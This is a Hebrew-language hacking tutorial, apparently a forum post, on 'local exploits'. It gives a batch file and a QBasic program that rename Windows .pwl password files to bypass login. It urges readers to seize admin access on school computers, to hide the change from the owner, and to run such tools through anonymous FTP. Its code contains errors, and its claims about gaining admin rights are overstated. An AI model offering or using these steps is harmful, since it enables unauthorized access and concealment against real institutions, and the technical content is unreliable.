אוקי אז דבר ראשון מה זה local exploit
local exploit או בעברית אקספלויט לוקאלי הוא אקספלויט שאתה מפעיל אותו על מחשב שיש לך גישה פיזית עליו
לדוגמא למה צריך אקספלויט לוקאלי:נגיד אתם בבית ספר נותנים לכם גישה כיוזר ששמו user12 ואין לו סיסמא אבל אין לו גישה לקבצים חשובים
אתם מפעילים אקספלוט לוקאלי ואז אתם האדמינים
אז איך בונים אקספלויט לוקאלי כזה?
זה כל כך פשוט שאתם פשוט לא תאמינו שלא חשבתם על זה עדין אתם פשוט משנים את השם של הקובץ סיסמאות
למי שעדים לא יודע אז הקובץ סיסמאות הוא *.pwl אז מה שאתם עושים זה קובץ אצווה כזה:
cd\
cd windows
ren *.pwl *.www


וזה האקפלויט הלוקאלי שלנו עכשיו אתם עושים ריסט ואתם יכולים להכנס בלי סיסמא כאדמינים
עכשיו הסבר קצר:
cd\
cd windows
נכנס לתקיה שבה נמצאים קבצי הpwl
ren *.pwl *.www
משנה את השם של קבצי הpwl לסיומת www שהיא סיומת שהמחשב לא מכיר אותה ואז אחרי שעושים ריסט המחשב לא מוצא את הקובץ סיסמאות וחושב שעדין לא נתנו אותו ואיזה סיסמא שתכניסו תהיה הסיסמא החדשה של האדמין
עכשיו אני יראה לכם אקספלויט לוקאלי קצת יותר מורכב בqbasic שcp77fk4r בנה והסביר לי אותו ומאז אני יודע לבנות אקספלויטים לוקאלים
הקוד:

while a=1 or a=2
input a
wend
cls
shell "cd\"
shell "c:\"
shell "cd windows"
if a=1 then gosub1
if a=2 then gosub2
1:
shell "ren *.pwl *.www"
end
2:
shell "ren *.www *.pwl"
end
האקספלויט הלוקאלי הזה הוא בערך כמו האקספלויט שלוקאלי שבנינו קודם באצווה רק שהוא קצת יותר מתוחכם:
האקספלויט הלוקאלי הזה מבקש מהמשתמש קלט של מספר או 1 או 2
אם הקלט הוא 1 אז האקספלויט ישנה את השם של קבצי הpwl ותהיה לך גישת אדמין
ואם הקלט הוא 2 אז המחשב חוזר למצב הקודם ואז בעל המחשב לא ישים לב
עכשיו עוד דוגמא קצת יותר חשובה שתעזור לכם:
יש סוג של ftp שנותן לך להכנס אנונימיות ויש לך גישת העלאה אז אפשר להכנס באנונמיות ולהריץ שם אקספלויט לוקאלי ואז אתה האדמין

וזהו סוף הטקסט על אקספלויט לוקאלי מקווה שנהנתם ושאתם האדמינים של הבית ספר שלכם